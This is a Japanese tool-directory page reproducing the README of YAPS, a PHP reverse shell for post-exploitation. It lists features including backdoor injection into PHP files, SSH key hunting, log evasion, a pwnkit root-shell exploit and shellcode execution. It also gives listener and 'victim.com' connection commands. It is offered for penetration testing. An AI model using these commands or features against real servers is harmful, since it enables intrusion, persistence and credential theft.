Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
YAPS — Yet Another PHP Shell - 最も完全なPHPリバースシェル | Kitploit
ツール/GitHubGitHub/nickguitar/yaps
特権昇格ペイロード生成脆弱性分析エクスプロイトシェルコード情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubnickguitar/yaps

YAPS

8494年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Yet Another PHP Shell - 最も完全なPHPリバースシェル

リポジトリを見る

YAPS - Yet Another PHP Shell (また別のPHPシェル)

image

はい、名前が示す通り、これはまた別のPHPリバースシェルで、世の中に数百あるものの一つですが、いくつかの利点があります。すべての機能を含む単一のPHPファイルであり、シンプルなTCPリスナー(例:nc -lp 1337)で制御できます。

現在のバージョン(1.5)では、主要機能はLinuxシステムのみをサポートしていますが、今後Windowsでも動作するように計画しています。

現在は最初のバージョンであり、まだ十分にテストされていません。次バージョンでは行いたいことや改善点がまだたくさんあります(まだ完成していません!)。バグを見つけたり、機能や改善の提案があればお知らせください。=)

機能

  • 単一のPHPファイル(パッケージやライブラリのインストール、大量のファイルのダウンロードは不要)
  • netcat、ncat、socat、multi/handlerなど、ほぼすべてのリスナーで動作
  • カスタマイズ可能なパスワード保護
  • .bash_historyにログを残さない
  • いくつかの情報収集を実行
    • ネットワーク情報(インターフェース、iptablesルール、アクティブポート)
    • ユーザー情報
    • SUIDおよびGUIDファイルの一覧表示
    • SSHキーの検索(公開鍵と秘密鍵)
    • crontabの一覧表示
    • 書き込み可能なPHPファイルの一覧表示
  • LinPEAS、LinEnum、Linux Exploit Suggesterの自動ダウンロード
  • リモートホストでPHPコードを記述して実行
  • インタラクティブなリバースシェルを起動
  • 必要なだけ接続を複製
  • 自動更新
  • PHPファイルにバックドアを注入
  • pwnkit(CVE-2021-4034)を介した自動ルートリバースシェル
  • [NEW] シェルコードの送信と実行

欠点

  • 接続は暗号化されていません(まだ)(ncはSSLをサポートしていません)
  • 完全なインタラクティブではありません(ただし !interactive でインタラクティブシェルを起動できます)
    • CTRL+Cで切断されます; 矢印キーでのナビゲーションはできません(rlwrap nc -lp <ip> <port> を使用する場合を除く)

使用方法

  1. TCPリスナーをセットアップします。
  2. 自分のIPとポートを設定します。これは次の方法で行えます:
  • 2.1 スクリプトの先頭にある変数を編集する。
  • 2.2 POSTリクエストで設定する(curl -x POST -d "x=ip:port" victim.com/yaps.php)。
  1. ブラウザでyaps.phpを開くか、curlで取得するか、CLIで実行します。
  • 3.1 yaps.php?s または yaps.php?silent を設定するとバナーを非表示にできます。
  • 3.2 CLIで php yaps.php ip port のように実行できます。
  1. ハック開始!

使用可能なコマンド

  • !help - ヘルプメニューを表示
  • !all-colors - すべての色を切り替え(色なしTTYに対応)
  • !color - PS1の色を切り替え(ローカルのみ、環境変数は変更されません)
  • !duplicate - 別のYAPS接続を生成
  • !enum - LinPEASとLinEnumを/tmpにダウンロードして使用可能にする
  • !info - ターゲットの情報(前述の列挙)を一覧表示
  • !infect - 書き込み可能なPHPファイルにバックドアを注入
  • !interactive - 他のポートにインタラクティブリバースシェルを起動(sudo、su、mysqlなどで動作)
  • !passwd - パスワードオプション(有効化、無効化、設定、変更)
  • !php - リモートホストでPHPを記述して実行
  • !pwnkit - CVE-2021-4034のエクスプロイトを試み、ルートリバースシェルを起動
  • !shellcode - リモートホストにシェルコードを送信して実行

スクリーンショット

スクリーンショットセクションを展開

現在のコマンド:

commands

偵察を実行中:

image

CVE-2021-4034によるルートリバースシェル

pwn

シェルコードの送信と実行!

shellcode

インタラクティブシェルの起動

interactive

YAPSセッションの複製

duplicate

PHPファイルへのバックドア注入

変更履歴

v1.5 - 2022/02/12

  • !shellcodeを追加して任意のシェルコードを受信・実行
  • duplicate()関数を改善(ポート範囲を指定可能に)
  • 関数名をstabilizeからinteractiveに変更
  • コードを圧縮してスペースを節約
  • リンク切れを修正
  • すべてのコマンドの先頭に"TERM=xterm"を追加
  • 小規模な改善

v1.4 - 2022/02/04

  • !pwnkitを追加してCVE-2021-4034を悪用しルートリバースシェルを起動
  • verify_update()関数を改善
  • 小規模な改善

v1.3.1 - 2021/08/01

  • バグ修正

v1.3 - 2021/07/28

  • !infectを追加してPHPファイルにバックドアを注入
  • !stabilizeのペイロードを変更(バグ修正)

v1.2.2 - 2021/07/18

  • 'update'関数を変更
  • 'connect'関数を変更
  • 'download'関数を改善
  • バグ修正

v1.2.1 - 2021/07/17

  • バグ修正

v1.2 - 2021/07/17

  • !duplicateを追加して別のシェルを起動
  • 更新確認を追加(--update|-u)
  • CLI引数を追加(--help|-h)
  • 引数によるソケット接続を追加(php yaps.php ip port)
  • シェル安定化方法を変更(フリーズしなくなりました)
  • ダウンロード方法を変更
  • POST経由の接続方法を変更(単一パラメータを受信)

v1.1 - 2021/07/12

  • !all-colorsを追加してターミナルの色を切り替え、色なしTTYに対応
  • exitコマンドを追加してソケットを閉じる(シェルを終了)
  • !stabilizeのペイロードを変更してHISTSIZEとHISTFILEを設定解除
  • !infoでCPUとmeminfoを取得する方法を変更

v1.0.1 - 2021/07/08

  • [x,y,z]をarray(x,y,z)に変更し、古いPHPバージョンとの互換性を向上
  • PHP<5.4で動作するようインタラクティブシェルのペイロードを変更

クレジット

いくつかのアイデアは以下のツールからインスピレーションを得ています:

Linpeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Linenum

https://github.com/rebootuser/LinEnum

Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Pentest Monkey

https://github.com/pentestmonkey/php-reverse-shell

Arthepsy exploit for pwnkit

https://github.com/arthepsy/CVE-2021-4034/

ツールをダウンロード
  • !suggester - Linux Exploit Suggesterを/tmpにダウンロードして使用可能にする
  • infect

    リモートPHPコードの記述

    remotephp

    パスワードで保護されたシェル

    passprotected